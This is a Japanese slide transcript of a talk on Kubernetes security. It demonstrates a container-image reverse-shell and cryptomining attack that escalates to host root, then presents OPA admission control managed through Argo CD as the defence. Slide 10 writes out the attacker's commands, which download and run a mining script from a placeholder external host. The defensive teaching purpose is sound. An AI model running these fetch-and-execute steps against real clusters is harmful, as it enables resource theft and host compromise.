GitOpsで実装するK8sセキュリティ -攻撃者が考えるアタックシナリオとOSSを活用した守り方-

Transcript

1. © Kazuhiko Tsuji GitOpsで実装するK8sセキュリティ -攻撃者が考えるアタックシナリオとOSSを活⽤した守り⽅- 辻 紀彦 / Kazuhiko Tsuji

2. © Kazuhiko Tsuji ⾃⼰紹介 1 ⽒名 辻 紀彦 / ツジ

   カズヒコ 所属 株式会社マクニカ ネットワークス カンパニー 業務内容 • クラウドセキュリティリサーチ • クラウドネイティブなテクノロジーを活⽤した顧客対応 • ツール選定 • アーキテクチャデザイン • セキュリティデザイン 保有資格

3. © Kazuhiko Tsuji Kubernetes Security Table of Contents 2 コンテナテクノロジーとセキュリティ

   01 02 03 Host OS Container Engine kubelet Pod Container Pod Container Pod Container Pod Container Pod Container Pod Container セキュリティインシデント実演 セキュリティ課題と対策

4. © Kazuhiko Tsuji 本セッションの概要 • 対象者 • コンテナテクノロジー/Kubernetesのセキュリティ運⽤に関⼼のある⽅ • Kubernetesの基本的なオペレーションが理解できる⽅

   • セキュリティ運⽤のバリエーションを増やしたい⽅ • ⽬的 • Kubernetesを利⽤する技術者として • コンテナ運⽤のセキュリティリスクを理解する • セキュリティリスクを軽減するために有効な運⽤⼿法を理解する • 留意事項 • 本セッションはサイバー攻撃とその攻撃者を肯定、後援する意図を含みません • 本セッションに含まれる全てのコンテンツは発表者個⼈の⾒解に基づくものであり、所属する企業や組織の⽴ 場、戦略、意⾒を代表するものではありません 3

5. © Kazuhiko Tsuji 4 コンテナテクノロジーとセキュリティ

6. © Kazuhiko Tsuji コンテナテクノロジーと運⽤課題 5 多種多様なコンテナイメージが存在する コンテナ内部の異変に気付きにくい HW コンテナ運⽤の特性 正しい選択が求められる

   管理対象の構成コンポーネントが多い 稼働中のコンテナに対してメンテナンスを実⾏しない 管理コスト コンテナイメージからコンテナを⽣成 正しく運⽤するために豊富なナレッジが必要 OS Container runtime Container workload コンテナ運⽤に掛かるコスト マニフェスト 頻繁なアップデート(新機能、仕様刷新) エコシステム 学習コスト HW OS App Container Container Engine Container Container メンテナンス Container orchestrator

7. © Kazuhiko Tsuji コンテナテクノロジーのセキュリティトレンド 6 パブリックなコンテナイメージレポジトリに配置された⾮公式なイメージ Kubernetes: api-server, kubelet, etcd等の脆弱な設定

   悪性プロセスを組み込んだコンテナイメージのパブリック共有 コンテナテクノロジーならではの特性を利⽤した攻撃の観測件数が増加 コンテナの遠隔操作 RBACの不適切設定による過剰な権限付与 コンテナプラットフォームの脆弱なコンポーネントをアタックサーフェイスとして利⽤ 資格情報の搾取 侵害範囲の拡張 コンピューティングリソースの盗⽤を⽬的とした攻撃が⼤多数 悪性コンテナのデプロイ コンテナホストの侵害 マイニングプロセスの実⾏ Container image

8. © Kazuhiko Tsuji 7 セキュリティインシデント実演

9. © Kazuhiko Tsuji アタックシナリオ 8 パブリックイメージレジストリ 公式レポジトリ ⾮公式レポジトリ Container image

   Container image Backdoor Server Listening on XXXXXX Kubernetes Cluster ubuntu01 Host OS Container Engine ubuntu02 ubuntu03 kubelet master worker worker Host OS Container Engine kubelet Host OS Container Engine kubelet Pod Container Pod kube-apiserver Pod Container Pod Container Pod Container Pod Container Pod Container Pod Container Pod Container Pod Container Pod Container Pod Container Pod Container 01. Reverse Shellを組み込んだコンテナイメージをアップロード 02. ⾮公式レポジトリからイメージをpull & 実⾏ 03. Podの実⾏と同時にBackdoorに対してセッション確⽴ 04. パッケージのインストール(curl) 05. マイニングスクリプトのダウンロード 06. マイニングスクリプトの実⾏ 攻撃者 開発者 07. 侵害済みPodの偵察 08. kubectlのインストール 09. 環境変数の追加 10. 悪性Podのデプロイ 11. 悪性Podのシェルにアクセス 12. ホストOSのLinuxネームスペースにアクセス 13. ホストOSのルート権限獲得 ステップ01 ステップ02 ステップ03 id uid=0(root) gid=0(root) groups=0(root)

10. © Kazuhiko Tsuji インシデント考察 • 何が起こった? • ⾮公式なパブリックレポジトリからコンテナイメージをPullして使⽤した • Podの実⾏と同時にコンテナ内部からBackdoorサーバに対してセッションが確⽴された

    • 攻撃者によりコンテナの遠隔操作が実⾏された • コンテナのコンピューティングリソースを盗⽤され、仮想通貨のマイニングプロセスを実⾏された • 何が問題? • コンテナイメージ • 組織で許可されていない⾮公式なコンテナイメージを使⽤した ルールは存在するが強制する仕組みが存在しない • ランタイム • 攻撃者による脅威オペレーションの実⾏を許した コンテナ内部で発⽣するイベントを監視、制御できる仕組みが存在しない 9

11. © Kazuhiko Tsuji • curlコマンドによるマイニングスクリプトのダウンロード • 外部ストレージへのセッション⽣成 • ファイルシステムへの書き込み アタックシナリオ

    10 ステップ01 拡散 準備 実⾏ • パブリックイメージレポジトリでのコンテナイメージの配布 • 脅威プロセスを組み込んだコンテナイメージの拡散 • パッケージマネージャーによるcurlコマンドのインストール • ファイルシステムへの書き込み • マイニングプロセスの実⾏ • 外部ホストへのセッション⽣成 フェーズ 脅威タスク 脅威オペレーション apt install curl -y curl --remote-name-all https://<外部ストレージ>/{entrypoint.sh,pause} sh entrypoint.sh Reverse ShellによりBackdoorに対してセッションが確⽴ (開発者)Podのデプロイ時に⾮公式なコンテナイメージをPull セキュリティ課題 ハイリスクなコンテナイメージの使⽤

12. © Kazuhiko Tsuji 11 セキュリティ課題と対策

13. © Kazuhiko Tsuji セキュリティ課題: ハイリスクなコンテナイメージの使⽤ 12 ⾮公式なコンテナイメージの使⽤ kubectl run <pod名>

    --image=<⾮公式なコンテナイメージ> 公式レポジトリ以外からのコンテナイメージのPull ⾮公式なコンテナイメージの使⽤により、セキュリティリスクが⾼まる 悪性プロセスが組み込まれているリスクがある 対策 Kubernetes Admission ControllersによるAPIリクエスト検証 OPA - Open Policy Agent: https://github.com/open-policy-agent/opa • Mutation - 編集 逐次処理 (Sequential) • Validation - 監査 並列処理 (Parallel) 効果 使⽤を許可するコンテナイメージのリストをポリシーとして定義 ↓ Pod⽣成のAPIリクエストをValidationにより検証 ↓ コンテナイメージが許可リストに含まれる場合: 作成許可 コンテナイメージが許可リストに含まれない場合: 作成拒否 ↓ 組織で許可されていないコンテナイメージは使⽤できない https://kubernetes.io/blog/2019/03/21/a-guide-to-kubernetes-admission-controllers/#what-are-kubernetes-admission-controllers

14. © Kazuhiko Tsuji セキュリティ課題: ハイリスクなコンテナイメージの使⽤ 13 運⽤課題 • コンテナイメージの許可リストの管理 •

    許可リストの更新プロセス (ユーザーからの更新リクエスト、管理者による更新判定) • 許可リストが更新された場合のCustom Resouceの更新 対策 GitOpsによるガバナンス型セキュリティ運⽤ Kubernetes Admission Controllers + Declarative Continuous Delivery Argo CD: https://github.com/argoproj/argo-cd 効果 git上で使⽤を許可するコンテナイメージのリストを管理 • ユーザーからのPull Request • 管理者によるReview & Merge ↓ Argo CDによりOPAのCustom Resourceを⾃動更新 ↓ Pod⽣成のAPIリクエストをValidationにより判定 ↓ 組織で許可されていないコンテナイメージは使⽤できない Single Source of Truth (Git上のデータを信頼できる唯⼀の情報源とする) Allowed Image List レポジトリ Kubernets Cluster ①Pull Request ②Review & Merge ③Sync ④Custom Resourceの更新 ユーザー ⑤APIリクエスト Podの⽣成 ⑥Validationによるコンテナイメージの検証 管理者

15. © Kazuhiko Tsuji <参考情報> Kubernetesのセキュリティ運⽤ 14 必要なセキュリティ機能と適⽤可能なOSS 可視化 ワークロード 種別

    対象 機能 コンテナホスト 管理オブジェクトのマッピング ネットワークコネクション・通信ポートの表⽰ メトリクスの表⽰ セキュリティスキャン ランタイム監視 ランタイム防御 コンテナイメージ マニフェスト ワークロード Kubernetes Cluster RBAC プロセス ネットワーク ファイルシステム ポリシー適⽤ マニフェスト 脆弱性の検知 不適切な設定状態の検知 コンプライアンス準拠状況の監査 ランタイムイベントの検知と防御 ガバナンス型ルール準拠 Open Policy Agent Tetragon Falco trivy kube-bench kubesec.io Popeye rbac-police Kiali kube-state-metrics OSS

16. © Kazuhiko Tsuji 15 まとめ

17. © Kazuhiko Tsuji まとめ 16 コンピューティングリソースの盗⽤を⽬的とした攻撃が⼤多数 コンテナテクノロジーならではの特性を利⽤した攻撃の観測件数が増加 コンテナテクノロジーのセキュリティトレンド コンテナの遠隔操作 ハイリスクなコンテナイメージの使⽤

    セキュリティインシデントの実演 マイニングプロセスの実⾏ Open Policy Agent セキュリティ課題と対策 Kubernetes Admission ControllersによるAPIリクエスト検証 Argo CD Single Source of Truth (Git上のデータを信頼できる唯⼀の情報源とする) GitOpsによるガバナンス型セキュリティ運⽤

18. © Kazuhiko Tsuji Fin. Thank you!